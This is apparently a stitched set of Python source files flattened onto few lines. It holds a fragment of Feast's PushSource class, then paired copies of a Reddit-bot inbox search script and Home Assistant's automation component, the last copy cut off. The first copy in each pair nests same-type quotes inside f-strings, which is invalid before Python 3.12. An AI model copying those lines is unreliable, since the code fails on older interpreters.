vs transformed events batch_source: DataSource def __init__( self, *args, name: Optional[str] = None, batch_source: Optional[DataSource] = None, description: Optional[str] = "", tags: Optional[Dict[str, str]] = None, owner: Optional[str] = "", ): """ Creates a PushSource object. Args: name: Name of the push source batch_source: The batch source that backs this push source. It's used when materializing from the offline store to the online store, and when retrieving historical features. description (optional): A human-readable description. tags (optional): A dictionary of key-value pairs to store arbitrary metadata. owner (optional): The owner of the data source, typically the email of the primary maintainer. """ positional_attributes = ["name", "batch_source"] _name = name _batch_source = batch_source if args: warnings.warn( ( "Push source parameters should be specified as a keyword argument instead of a positional arg." "Feast 0.23+ will not support positional arguments to construct push sources" ), DeprecationWarning, ) if len(args) > len(positional_attributes): raise ValueError( f"Only {', '.join(positional_attributes)} are allowed as positional args when defining " f"push sources, for backwards compatibility." ) if len(args) >= 1: _name = args[0] if len(args) >= 2: _batch_source = args[1] super().__init__(name=_name, description=description, tags=tags, owner=owner) if not _batch_source: raise ValueError( f"batch_source parameter is needed for push source {self.name}" ) self.batch_source = _batch_source def __eq__(self, other): if not isinstance(other, PushSource): raise TypeError("Comparisons should only involve PushSource class objects.") if not super().__eq__(other): return False if self.batch_source != other.batch_source: return False return True def __hash__(self): return super().__hash__() def validate(self, config: RepoConfig): pass def get_table_column_names_and_types( self, config: RepoConfig ) -> Iterable[Tuple[str, str]]: pass @staticmethod def from_proto(data_source: DataSourceProto): assert data_source.HasField("batch_source") batch_source = DataSource.from_proto(data_source.batch_source) return PushSource( name=data_source.name, batch_source=batch_source, description=data_source.description, tags=dict(data_source.tags), owner=data_source.owner, ) def to_proto(self) -> DataSourceProto: batch_source_proto = None if self.batch_source: batch_source_proto = self.batch_source.to_proto() data_source_proto = DataSourceProto( name=self.name, type=DataSourceProto.PUSH_SOURCE, description=self.description, tags=self.tags, owner=self.owner, batch_source=batch_source_proto, ) return data_source_proto def get_table_query_string(self) -> str: raise NotImplementedError @staticmethod def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]: raise NotImplementedError
#!/usr/bin/env python3 import json import logging import os import sys import redis import shared.util as util from shared.exceptions import AlreadyProcessed, CurrentlyProcessing def main(): for message in reddit.inbox.stream(): search(message) def search(message): bot_mention = util.contains_username(config['BOT_NAME'], message.body) link = util.contains_link(message.body) if bot_mention or link: try: search_request(message) except (AlreadyProcessed, CurrentlyProcessing) as pe: util.open_lock(redis, message.id) message.mark_read() logging.error(f"{pe} Trying to mark as read.") except Exception as e: util.open_lock(redis, message.id) logging.error(f"{type(e).__name__} occurred while searching for request {message.id}: {e}") def search_request(message): # Create request request = { "id": message.id, "type": "comment" if message.was_comment else "message", "author": str(message.author), "link": f"https://www.reddit.com{message.context}" if message.was_comment else f"https://www.reddit.com/message/messages/{message.id}", "retries": 0 } # Check for duplicates util.already_processed_check(redis, request) lock = util.get_lock(request['id']) if redis.exists(lock): raise CurrentlyProcessing(request['link']) # Lock request to avoid duplicates redis.set(lock, "") request_json = json.dumps(request) # Enqueue for filtering redis.sadd(config['REDIS_REQUESTS_FILTER'], request_json) message.mark_read() logging.info(f"Found new request {request["id"]} : {request["link"]}.") if __name__ == '__main__': util.log("search") config = util.load_configuration() reddit = util.authenticate() redis = redis.Redis(host=os.environ['REDIS_HOST'], port=os.environ['REDIS_PORT']) main()
#!/usr/bin/env python3 import json import logging import os import sys import redis import shared.util as util from shared.exceptions import AlreadyProcessed, CurrentlyProcessing def main(): for message in reddit.inbox.stream(): search(message) def search(message): bot_mention = util.contains_username(config['BOT_NAME'], message.body) link = util.contains_link(message.body) if bot_mention or link: try: search_request(message) except (AlreadyProcessed, CurrentlyProcessing) as pe: util.open_lock(redis, message.id) message.mark_read() logging.error(f"{pe} Trying to mark as read.") except Exception as e: util.open_lock(redis, message.id) logging.error(f"{type(e).__name__} occurred while searching for request {message.id}: {e}") def search_request(message): # Create request request = { "id": message.id, "type": "comment" if message.was_comment else "message", "author": str(message.author), "link": f"https://www.reddit.com{message.context}" if message.was_comment else f"https://www.reddit.com/message/messages/{message.id}", "retries": 0 } # Check for duplicates util.already_processed_check(redis, request) lock = util.get_lock(request['id']) if redis.exists(lock): raise CurrentlyProcessing(request['link']) # Lock request to avoid duplicates redis.set(lock, "") request_json = json.dumps(request) # Enqueue for filtering redis.sadd(config['REDIS_REQUESTS_FILTER'], request_json) message.mark_read() logging.info(f"Found new request {request['id']} : {request['link']}.") if __name__ == '__main__': util.log("search") config = util.load_configuration() reddit = util.authenticate() redis = redis.Redis(host=os.environ['REDIS_HOST'], port=os.environ['REDIS_PORT']) main()
"""Allow to set up simple automation rules via the config file.""" from __future__ import annotations import logging from typing import Any, Awaitable, Callable, Dict, cast import voluptuous as vol from voluptuous.humanize import humanize_error from homeassistant.components import blueprint from homeassistant.const import ( ATTR_ENTITY_ID, ATTR_MODE, ATTR_NAME, CONF_ALIAS, CONF_CONDITION, CONF_DEVICE_ID, CONF_ENTITY_ID, CONF_ID, CONF_MODE, CONF_PLATFORM, CONF_VARIABLES, CONF_ZONE, EVENT_HOMEASSISTANT_STARTED, SERVICE_RELOAD, SERVICE_TOGGLE, SERVICE_TURN_OFF, SERVICE_TURN_ON, STATE_ON, ) from homeassistant.core import ( Context, CoreState, HomeAssistant, callback, split_entity_id, ) from homeassistant.exceptions import ( ConditionError, ConditionErrorContainer, ConditionErrorIndex, HomeAssistantError, ) from homeassistant.helpers import condition, extract_domain_configs, template import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity import ToggleEntity from homeassistant.helpers.entity_component import EntityComponent from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.helpers.script import ( ATTR_CUR, ATTR_MAX, CONF_MAX, CONF_MAX_EXCEEDED, Script, ) from homeassistant.helpers.script_variables import ScriptVariables from homeassistant.helpers.service import async_register_admin_service from homeassistant.helpers.trace import trace_get, trace_path from homeassistant.helpers.trigger import async_initialize_triggers from homeassistant.helpers.typing import TemplateVarsType from homeassistant.loader import bind_hass from homeassistant.util.dt import parse_datetime from . import websocket_api from .config import AutomationConfig, async_validate_config_item # Not used except by packages to check config structure from .config import PLATFORM_SCHEMA # noqa: F401 from .const import ( CONF_ACTION, CONF_INITIAL_STATE, CONF_TRIGGER, CONF_TRIGGER_VARIABLES, DEFAULT_INITIAL_STATE, DOMAIN, LOGGER, ) from .helpers import async_get_blueprints from .trace import DATA_AUTOMATION_TRACE, trace_automation # mypy: allow-untyped-calls, allow-untyped-defs # mypy: no-check-untyped-defs, no-warn-return-any ENTITY_ID_FORMAT = DOMAIN + ".{}" CONF_SKIP_CONDITION = "skip_condition" CONF_STOP_ACTIONS = "stop_actions" DEFAULT_STOP_ACTIONS = True EVENT_AUTOMATION_RELOADED = "automation_reloaded" EVENT_AUTOMATION_TRIGGERED = "automation_triggered" ATTR_LAST_TRIGGERED = "last_triggered" ATTR_SOURCE = "source" ATTR_VARIABLES = "variables" SERVICE_TRIGGER = "trigger" _LOGGER = logging.getLogger(__name__) AutomationActionType = Callable[[HomeAssistant, TemplateVarsType], Awaitable[None]] @bind_hass def is_on(hass, entity_id): """ Return true if specified automation entity_id is on. Async friendly. """ return hass.states.is_state(entity_id, STATE_ON) @callback def automations_with_entity(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all automations that reference the entity.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if entity_id in automation_entity.referenced_entities ] @callback def entities_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all entities in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_entities) @callback def automations_with_device(hass: HomeAssistant, device_id: str) -> list[str]: """Return all automations that reference the device.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if device_id in automation_entity.referenced_devices ] @callback def devices_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all devices in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_devices) async def async_setup(hass, config): """Set up all automations.""" # Local import to avoid circular import hass.data[DOMAIN] = component = EntityComponent(LOGGER, DOMAIN, hass) hass.data.setdefault(DATA_AUTOMATION_TRACE, {}) websocket_api.async_setup(hass) # To register the automation blueprints async_get_blueprints(hass) if not await _async_process_config(hass, config, component): await async_get_blueprints(hass).async_populate() async def trigger_service_handler(entity, service_call): """Handle forced automation trigger, e.g. from frontend.""" await entity.async_trigger( {**service_call.data[ATTR_VARIABLES], "trigger": {"platform": None}}, skip_condition=service_call.data[CONF_SKIP_CONDITION], context=service_call.context, ) component.async_register_entity_service( SERVICE_TRIGGER, { vol.Optional(ATTR_VARIABLES, default={}): dict, vol.Optional(CONF_SKIP_CONDITION, default=True): bool, }, trigger_service_handler, ) component.async_register_entity_service(SERVICE_TOGGLE, {}, "async_toggle") component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on") component.async_register_entity_service( SERVICE_TURN_OFF, {vol.Optional(CONF_STOP_ACTIONS, default=DEFAULT_STOP_ACTIONS): cv.boolean}, "async_turn_off", ) async def reload_service_handler(service_call): """Remove all automations and load new ones from config.""" conf = await component.async_prepare_reload() if conf is None: return async_get_blueprints(hass).async_reset_cache() await _async_process_config(hass, conf, component) hass.bus.async_fire(EVENT_AUTOMATION_RELOADED, context=service_call.context) async_register_admin_service( hass, DOMAIN, SERVICE_RELOAD, reload_service_handler, schema=vol.Schema({}) ) return True class AutomationEntity(ToggleEntity, RestoreEntity): """Entity to show status of entity.""" def __init__( self, automation_id, name, trigger_config, cond_func, action_script, initial_state, variables, trigger_variables, raw_config, ): """Initialize an automation entity.""" self._id = automation_id self._name = name self._trigger_config = trigger_config self._async_detach_triggers = None self._cond_func = cond_func self.action_script = action_script self.action_script.change_listener = self.async_write_ha_state self._initial_state = initial_state self._is_enabled = False self._referenced_entities: set[str] | None = None self._referenced_devices: set[str] | None = None self._logger = LOGGER self._variables: ScriptVariables = variables self._trigger_variables: ScriptVariables = trigger_variables self._raw_config = raw_config @property def name(self): """Name of the automation.""" return self._name @property def unique_id(self): """Return unique ID.""" return self._id @property def should_poll(self): """No polling needed for automation entities.""" return False @property def extra_state_attributes(self): """Return the entity state attributes.""" attrs = { ATTR_LAST_TRIGGERED: self.action_script.last_triggered, ATTR_MODE: self.action_script.script_mode, ATTR_CUR: self.action_script.runs, } if self.action_script.supports_max: attrs[ATTR_MAX] = self.action_script.max_runs if self._id is not None: attrs[CONF_ID] = self._id return attrs @property def is_on(self) -> bool: """Return True if entity is on.""" return self._async_detach_triggers is not None or self._is_enabled @property def referenced_devices(self): """Return a set of referenced devices.""" if self._referenced_devices is not None: return self._referenced_devices referenced = self.action_script.referenced_devices if self._cond_func is not None: for conf in self._cond_func.config: referenced |= condition.async_extract_devices(conf) for conf in self._trigger_config: device = _trigger_extract_device(conf) if device is not None: referenced.add(device) self._referenced_devices = referenced return referenced @property def referenced_entities(self): """Return a set of referenced entities.""" if self._referenced_entities is not None: return self._referenced_entities referenced = self.action_script.referenced_entities if self._cond_func is not None: for conf in self._cond_func.config: referenced |= condition.async_extract_entities(conf) for conf in self._trigger_config: for entity_id in _trigger_extract_entities(conf): referenced.add(entity_id) self._referenced_entities = referenced return referenced async def async_added_to_hass(self) -> None: """Startup with initial state or previous state.""" await super().async_added_to_hass() self._logger = logging.getLogger( f"{__name__}.{split_entity_id(self.entity_id)[1]}" ) self.action_script.update_logger(self._logger) state = await self.async_get_last_state() if state: enable_automation = state.state == STATE_ON last_triggered = state.attributes.get("last_triggered") if last_triggered is not None: self.action_script.last_triggered = parse_datetime(last_triggered) self._logger.debug( "Loaded automation %s with state %s from state " " storage last state %s", self.entity_id, enable_automation, state, ) else: enable_automation = DEFAULT_INITIAL_STATE self._logger.debug( "Automation %s not in state storage, state %s from default is used", self.entity_id, enable_automation, ) if self._initial_state is not None: enable_automation = self._initial_state self._logger.debug( "Automation %s initial state %s overridden from " "config initial_state", self.entity_id, enable_automation, ) if enable_automation: await self.async_enable() async def async_turn_on(self, **kwargs: Any) -> None: """Turn the entity on and update the state.""" await self.async_enable() async def async_turn_off(self, **kwargs: Any) -> None: """Turn the entity off.""" if CONF_STOP_ACTIONS in kwargs: await self.async_disable(kwargs[CONF_STOP_ACTIONS]) else: await self.async_disable() async def async_trigger(self, run_variables, context=None, skip_condition=False): """Trigger automation. This method is a coroutine. """ reason = "" if "trigger" in run_variables and "description" in run_variables["trigger"]: reason = f' by {run_variables['trigger']['description']}' self._logger.debug("Automation triggered%s", reason) # Create a new context referring to the old context. parent_id = None if context is None else context.id trigger_context = Context(parent_id=parent_id) with trace_automation( self.hass, self.unique_id, self._raw_config, trigger_context ) as automation_trace: if self._variables: try: variables = self._variables.async_render(self.hass, run_variables) except template.TemplateError as err: self._logger.error("Error rendering variables: %s", err) automation_trace.set_error(err) return else: variables = run_variables automation_trace.set_variables(variables) # Prepare tracing the evaluation of the automation's conditions automation_trace.set_condition_trace(trace_get()) if ( not skip_condition and self._cond_func is not None and not self._cond_func(variables) ): self._logger.debug( "Conditions not met, aborting automation. Condition summary: %s", trace_get(clear=False), ) return # Prepare tracing the execution of the automation's actions automation_trace.set_action_trace(trace_get()) self.async_set_context(trigger_context) event_data = { ATTR_NAME: self._name, ATTR_ENTITY_ID: self.entity_id, } if "trigger" in variables and "description" in variables["trigger"]: event_data[ATTR_SOURCE] = variables["trigger"]["description"] @callback def started_action(): self.hass.bus.async_fire( EVENT_AUTOMATION_TRIGGERED, event_data, context=trigger_context ) try: with trace_path("action"): await self.action_script.async_run( variables, trigger_context, started_action ) except (vol.Invalid, HomeAssistantError) as err: self._logger.error( "Error while executing automation %s: %s", self.entity_id, err, ) automation_trace.set_error(err) except Exception as err: # pylint: disable=broad-except self._logger.exception("While executing automation %s", self.entity_id) automation_trace.set_error(err) async def async_will_remove_from_hass(self): """Remove listeners when removing automation from Home Assistant.""" await super().async_will_remove_from_hass() await self.async_disable() async def async_enable(self): """Enable this automation entity. This method is a coroutine. """ if self._is_enabled: return self._is_enabled = True # HomeAssistant is starting up if self.hass.state != CoreState.not_running: self._async_detach_triggers = await self._async_attach_triggers(False) self.async_write_ha_state() return async def async_enable_automation(event): """Start automation on startup.""" # Don't do anything if no longer enabled or already attached if not self._is_enabled or self._async_detach_triggers is not None: return self._async_detach_triggers = await self._async_attach_triggers(True) self.hass.bus.async_listen_once( EVENT_HOMEASSISTANT_STARTED, async_enable_automation ) self.async_write_ha_state() async def async_disable(self, stop_actions=DEFAULT_STOP_ACTIONS): """Disable the automation entity.""" if not self._is_enabled and not self.action_script.runs: return self._is_enabled = False if self._async_detach_triggers is not None: self._async_detach_triggers() self._async_detach_triggers = None if stop_actions: await self.action_script.async_stop() self.async_write_ha_state() async def _async_attach_triggers( self, home_assistant_start: bool ) -> Callable[[], None] | None: """Set up the triggers.""" def log_cb(level, msg, **kwargs): self._logger.log(level, "%s %s", msg, self._name, **kwargs) variables = None if self._trigger_variables: try: variables = self._trigger_variables.async_render( self.hass, None, limited=True ) except template.TemplateError as err: self._logger.error("Error rendering trigger variables: %s", err) return None return await async_initialize_triggers( self.hass, self._trigger_config, self.async_trigger, DOMAIN, self._name, log_cb, home_assistant_start, variables, ) async def _async_process_config( hass: HomeAssistant, config: dict[str, Any], component: EntityComponent, ) -> bool: """Process config and add automations. Returns if blueprints were used. """ entities = [] blueprints_used = False for config_key in extract_domain_configs(config, DOMAIN): conf: list[dict[str, Any] | blueprint.BlueprintInputs] = config[ # type: ignore config_key ] for list_no, config_block in enumerate(conf): raw_config = None if isinstance(config_block, blueprint.BlueprintInputs): # type: ignore blueprints_used = True blueprint_inputs = config_block try: raw_config = blueprint_inputs.async_substitute() config_block = cast( Dict[str, Any], await async_validate_config_item(hass, raw_config), ) except vol.Invalid as err: LOGGER.error( "Blueprint %s generated invalid automation with inputs %s: %s", blueprint_inputs.blueprint.name, blueprint_inputs.inputs, humanize_error(config_block, err), ) continue else: raw_config = cast(AutomationConfig, config_block).raw_config automation_id = config_block.get(CONF_ID) name = config_block.get(CONF_ALIAS) or f"{config_key} {list_no}" initial_state = config_block.get(CONF_INITIAL_STATE) action_script = Script( hass, config_block[CONF_ACTION], name, DOMAIN, running_description="automation actions", script_mode=config_block[CONF_MODE], max_runs=config_block[CONF_MAX], max_exceeded=config_block[CONF_MAX_EXCEEDED], logger=LOGGER, # We don't pass variables here # Automation will already render them to use them in the condition # and so will pass them on to the script. ) if CONF_CONDITION in config_block: cond_func = await _async_process_if(hass, name, config, config_block) if cond_func is None: continue else: cond_func = None # Add trigger variables to variables variables = None if CONF_TRIGGER_VARIABLES in config_block: variables = ScriptVariables( dict(config_block[CONF_TRIGGER_VARIABLES].as_dict()) ) if CONF_VARIABLES in config_block: if variables: variables.variables.update(config_block[CONF_VARIABLES].as_dict()) else: variables = config_block[CONF_VARIABLES] entity = AutomationEntity( automation_id, name, config_block[CONF_TRIGGER], cond_func, action_script, initial_state, variables, config_block.get(CONF_TRIGGER_VARIABLES), raw_config, ) entities.append(entity) if entities: await component.async_add_entities(entities) return blueprints_used async def _async_process_if(hass, name, config, p_config): """Process if checks.""" if_configs = p_config[CONF_CONDITION] checks = [] for if_config in if_configs: try: checks.append(await condition.async_from_config(hass, if_config, False)) except HomeAssistantError as ex: LOGGER.warning("Invalid condition: %s", ex) return None def if_action(variables=None): """AND all conditions.""" errors = [] for index, check in enumerate(checks): try: with trace_path(["condition", str(index)]): if not check(hass, variables): return False except ConditionError as ex: errors.append( ConditionErrorIndex( "condition", index=index, total=len(checks), error=ex ) ) if errors: LOGGER.warning( "Error evaluating condition in '%s':\n%s", name, ConditionErrorContainer("condition", errors=errors), ) return False return True if_action.config = if_configs return if_action @callback def _trigger_extract_device(trigger_conf: dict) -> str | None: """Extract devices from a trigger config.""" if trigger_conf[CONF_PLATFORM] != "device": return None return trigger_conf[CONF_DEVICE_ID] @callback def _trigger_extract_entities(trigger_conf: dict) -> list[str]: """Extract entities from a trigger config.""" if trigger_conf[CONF_PLATFORM] in ("state", "numeric_state"): return trigger_conf[CONF_ENTITY_ID] if trigger_conf[CONF_PLATFORM] == "zone": return trigger_conf[CONF_ENTITY_ID] + [trigger_conf[CONF_ZONE]] if trigger_conf[CONF_PLATFORM] == "geo_location": return [trigger_conf[CONF_ZONE]] if trigger_conf[CONF_PLATFORM] == "sun": return ["sun.sun"] return []
"""Allow to set up simple automation rules via the config file.""" from __future__ import annotations import logging from typing import Any, Awaitable, Callable, Dict, cast import voluptuous as vol from voluptuous.humanize import humanize_error from homeassistant.components import blueprint from homeassistant.const import ( ATTR_ENTITY_ID, ATTR_MODE, ATTR_NAME, CONF_ALIAS, CONF_CONDITION, CONF_DEVICE_ID, CONF_ENTITY_ID, CONF_ID, CONF_MODE, CONF_PLATFORM, CONF_VARIABLES, CONF_ZONE, EVENT_HOMEASSISTANT_STARTED, SERVICE_RELOAD, SERVICE_TOGGLE, SERVICE_TURN_OFF, SERVICE_TURN_ON, STATE_ON, ) from homeassistant.core import ( Context, CoreState, HomeAssistant, callback, split_entity_id, ) from homeassistant.exceptions import ( ConditionError, ConditionErrorContainer, ConditionErrorIndex, HomeAssistantError, ) from homeassistant.helpers import condition, extract_domain_configs, template import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity import ToggleEntity from homeassistant.helpers.entity_component import EntityComponent from homeassistant.helpers.restore_state import RestoreEntity from homeassistant.helpers.script import ( ATTR_CUR, ATTR_MAX, CONF_MAX, CONF_MAX_EXCEEDED, Script, ) from homeassistant.helpers.script_variables import ScriptVariables from homeassistant.helpers.service import async_register_admin_service from homeassistant.helpers.trace import trace_get, trace_path from homeassistant.helpers.trigger import async_initialize_triggers from homeassistant.helpers.typing import TemplateVarsType from homeassistant.loader import bind_hass from homeassistant.util.dt import parse_datetime from . import websocket_api from .config import AutomationConfig, async_validate_config_item # Not used except by packages to check config structure from .config import PLATFORM_SCHEMA # noqa: F401 from .const import ( CONF_ACTION, CONF_INITIAL_STATE, CONF_TRIGGER, CONF_TRIGGER_VARIABLES, DEFAULT_INITIAL_STATE, DOMAIN, LOGGER, ) from .helpers import async_get_blueprints from .trace import DATA_AUTOMATION_TRACE, trace_automation # mypy: allow-untyped-calls, allow-untyped-defs # mypy: no-check-untyped-defs, no-warn-return-any ENTITY_ID_FORMAT = DOMAIN + ".{}" CONF_SKIP_CONDITION = "skip_condition" CONF_STOP_ACTIONS = "stop_actions" DEFAULT_STOP_ACTIONS = True EVENT_AUTOMATION_RELOADED = "automation_reloaded" EVENT_AUTOMATION_TRIGGERED = "automation_triggered" ATTR_LAST_TRIGGERED = "last_triggered" ATTR_SOURCE = "source" ATTR_VARIABLES = "variables" SERVICE_TRIGGER = "trigger" _LOGGER = logging.getLogger(__name__) AutomationActionType = Callable[[HomeAssistant, TemplateVarsType], Awaitable[None]] @bind_hass def is_on(hass, entity_id): """ Return true if specified automation entity_id is on. Async friendly. """ return hass.states.is_state(entity_id, STATE_ON) @callback def automations_with_entity(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all automations that reference the entity.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if entity_id in automation_entity.referenced_entities ] @callback def entities_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all entities in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_entities) @callback def automations_with_device(hass: HomeAssistant, device_id: str) -> list[str]: """Return all automations that reference the device.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] return [ automation_entity.entity_id for automation_entity in component.entities if device_id in automation_entity.referenced_devices ] @callback def devices_in_automation(hass: HomeAssistant, entity_id: str) -> list[str]: """Return all devices in a scene.""" if DOMAIN not in hass.data: return [] component = hass.data[DOMAIN] automation_entity = component.get_entity(entity_id) if automation_entity is None: return [] return list(automation_entity.referenced_devices) async def async_setup(hass, config): """Set up all automations.""" # Local import to avoid circular import hass.data[DOMAIN] = component = EntityComponent(LOGGER, DOMAIN, hass) hass.data.setdefault(DATA_AUTOMATION_TRACE, {}) websocket_api.async_setup(hass) # To register the automation blueprints async_get_blueprints(hass) if not await _async_process_config(hass, config, component): await async_get_blueprints(hass).async_populate() async def trigger_service_handler(entity, service_call): """Handle forced automation trigger, e.g. from frontend.""" await entity.async_trigger( {**service_call.data[ATTR_VARIABLES], "trigger": {"platform": None}}, skip_condition=service_call.data[CONF_SKIP_CONDITION], context=service_call.context, ) component.async_register_entity_service( SERVICE_TRIGGER, { vol.Optional(ATTR_VARIABLES, default={}): dict, vol.Optional(CONF_SKIP_CONDITION, default=True): bool, }, trigger_service_handler, ) component.async_register_entity_service(SERVICE_TOGGLE, {}, "async_toggle") component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on") component.async_register_entity_service( SERVICE_TURN_OFF, {vol.Optional(CONF_STOP_ACTIONS, default=DEFAULT_STOP_ACTIONS): cv.boolean}, "async_turn_off", ) async def reload_service_handler(service_call): """Remove all automations and load new ones from config.""" conf = await component.async_prepare_reload() if conf is None: return async_get_blueprints(hass).async_reset_cache() await _async_process_config(hass, conf, component) hass.bus.async_fire(EVENT_AUTOMATION_RELOADED, context=service_call.context) async_register_admin_service( hass, DOMAIN, SERVICE_RELOAD, reload_service_handler, schema=vol.Schema({}) ) return True class AutomationEntity(ToggleEntity, RestoreEntity): """Entity to show status of entity.""" def __init__( self, automation_id, name, trigger_config, cond_func, action_script, initial_state, variables, trigger_variables, raw_config, ): """Initialize an automation entity.""" self._id = automation_id self._name = name self._trigger_config = trigger_config self._async_detach_triggers = None self._cond_func = cond_func self.action_script = action_script self.action_script.change_listener = self.async_write_ha_state self._initial_state = initial_state self._is_enabled = False self._referenced_entities: set[str] | None = None self._referenced_devices: set[str] | None = None self._logger = LOGGER self._variables: ScriptVariables = variables self._trigger_variables: ScriptVariables = trigger_variables self._raw_config = raw_config @property def name(self): """Name of the automation.""" return self._name @property def unique_id(self): """Return unique ID.""" return self._id @property def should_poll(self): """No polling needed for automation entities.""" return False @property def extra_state_attributes(self): """Return the entity state attributes.""" attrs = { ATTR_LAST_TRIGGERED: self.action_script.last_triggered, ATTR_MODE: self.action_script.script_mode, ATTR_CUR: self.action_script.runs, } if self.action_script.supports_max: attrs[ATTR_MAX] = self.action_script.max_runs if self._id is not None: attrs[CONF_ID] = self._id return attrs @property def is_on(self) -> bool: """Return True if entity is on.""" return self._async_detach_triggers is not None or self._is_enabled @property def referenced_devices(self): """Return a set of referenced devices.""" if self._referenced_devices is not None: return self._referenced_devices referenced = self.action_script.referenced_devices if self._cond_func is not None: for conf in self._cond_func.config: referenced |= condition.async_extract_devices(conf) for conf in self._trigger_config: device = _trigger_extract_device(conf) if device is not None: referenced.add(device) self._referenced_devices = referenced return referenced @property def referenced_entities(self): """Return a set of referenced entities.""" if self._referenced_entities is not None: return self._referenced_entities referenced = self.action_script.referenced_entities if self._cond_func is not None: for conf in self._cond_func.config: referenced |= condition.async_extract_entities(conf) for conf in self._trigger_config: for entity_id in _trigger_extract_entities(conf): referenced.add(entity_id) self._referenced_entities = referenced return referenced async def async_added_to_hass(self) -> None: """Startup with initial state or previous state.""" await super().async_added_to_hass() self._logger = logging.getLogger( f"{__name__}.{split_entity_id(self.entity_id)[1]}" ) self.action_script.update_logger(self._logger) state = await self.async_get_last_state() if state: enable_automation = state.state == STATE_ON last_triggered = state.attributes.get("last_triggered") if last_triggered is not None: self.action_script.last_triggered = parse_datetime(last_triggered) self._logger.debug( "Loaded automation %s with state %s from state " " storage last state %s", self.entity_id, enable_automation, state, ) else: enable_automation = DEFAULT_INITIAL_STATE self._logger.debug( "Automation %s not in state storage, state %s from default is used", self.entity_id, enable_automation, ) if self._initial_state is not None: enable_automation = self._initial_state self._logger.debug( "Automation %s initial state %s overridden from " "config initial_state", self.entity_id, enable_automation, ) if enable_automation: await self.async_enable() async def async_turn_on(self, **kwargs: Any) -> None: """Turn the entity on and update the state.""" await self.async_enable() async def async_turn_off(self, **kwargs: Any) -> None: """Turn the entity off.""" if CONF_STOP_ACTIONS in kwargs: await self.async_disable(kwargs[CONF_STOP_ACTIONS]) else: await self.async_disable() async def async_trigger(self, run_variables, context=None, skip_condition=False): """Trigger automation. This method is a coroutine. """ reason = "" if "trigger" in run_variables and "description" in run_variables["trigger"]: reason = f' by {run_variables["trigger"]["description"]}' self._logger.debug("Automation triggered%s", reason) # Create a new context referring to the old context. parent_id = None if context is None else context.id trigger_context = Context(parent_id=parent_id) with trace_automation( self.hass, self.unique_id, self._raw_config, trigger_context ) as automation_trace: if self._variables: try: variables = self._variables.async_render(self.hass, run_variables) except template.TemplateError as err: self._logger.error("Error rendering variables: %s", err) automation_trace.set_error(err) return else: variables = run_variables automation_trace.set_variables(variables) # Prepare tracing the evaluation of the automation's conditions automation_trace.set_condition_trace(trace_get()) if ( not skip_condition and self._cond_func is not None and not self._cond_func(variables) ): self._logger.debug( "Conditions not met, aborting automation. Condition summary: %s", trace_get(clear=False), ) return # Prepare tracing the execution of the automation's actions automation_trace.set_action_trace(trace_get()) self.async_set_context(trigger_context) event_data = { ATTR_NAME: self._name, ATTR_ENTITY_ID: self.entity_id, } if "trigger" in variables and "description" in variables["trigger"]: event_data[ATTR_SOURCE] = variables["trigger"]["description"] @callback def started_action(): self.hass.bus.async_fire( EVENT_AUTOMATION_TRIGGERED, event_data, context=trigger_context ) try: with trace_path("action"): await self.action_script.async_run( variables, trigger_context, started_action ) except (vol.Invalid, HomeAssistantError) as err: self._logger.error( "Error while executing automation %s: %s", self.entity_id, err, ) automation_trace.set_error(err) except Exception as err: # pylint: disable=broad-except self._logger.exception("While executing automation %s", self.entity_id) automation_trace.set_error(err) async def async_will_remove_from_hass(self): """Remove listeners when removing automation from Home Assistant.""" await super().async_will_remove_from_hass() await self.async_disable() async def async_enable(self): """Enable this automation entity. This method is a coroutine. """ if self._is_enabled: return self._is_enabled = True # HomeAssistant is starting up if self.hass.state != CoreState.not_running: self._async_detach_triggers = await self._async_attach_triggers(False) self.async_write_ha_state() return async def async_enable_automation(event): """Start automation on startup.""" # Don't do anything if no longer enabled or already attached if not self._is_enabled or self._async_detach_triggers is not None: return self._async_detach_triggers = await self._async_attach_triggers(True) self.hass.bus.async_listen_once( EVENT_HOMEASSISTANT_STARTED, async_enable_automation ) self.async_write_ha_state() async def async_disable(self, stop_actions=DEFAULT_STOP_ACTIONS): """Disable the automation entity.""" if not self._is_enabled and not self.action_script.runs: return self._is_enabled = False if self._async_detach_triggers is not None: self._async_detach_triggers() self._async_detach_triggers = None if stop_actions: await self.action_script.async_stop() self.async_write_ha_state() async def _async_attach_triggers( self, home_assistant_start: bool ) -> Callable[[], None] | None: """Set up the triggers.""" def log_cb(level, msg, **kwargs): self._logger.log(level, "%s %s", msg, self._name, **kwargs) variables = None if self._trigger_variables: try: variables = self._trigger_variables.async_render( self.hass, None, limited=True ) except template.TemplateError as err: self._logger.error("Error rendering trigger variables: %s", err) return None return await async_initialize_triggers( self.hass, self._trigger_config, self.async_trigger, DOMAIN, self._name, log_cb, home_assistant_start, variables, ) async def _async_process_config( hass: HomeAssistant, config: dict[str, Any], component: EntityComponent, ) -> bool: """Process config and add automations. Returns if blueprints were used. """ entities = [] blueprints_used = False for config_key in extract_domain_configs(config, DOMAIN): conf: list[dict[str, Any] | blueprint.BlueprintInputs] = config[ # type: ignore config_key ] for list_no, config_block in enumerate(conf): raw_config = None if isinstance(config_block, blueprint.BlueprintInputs): # type: ignore blueprints_used = 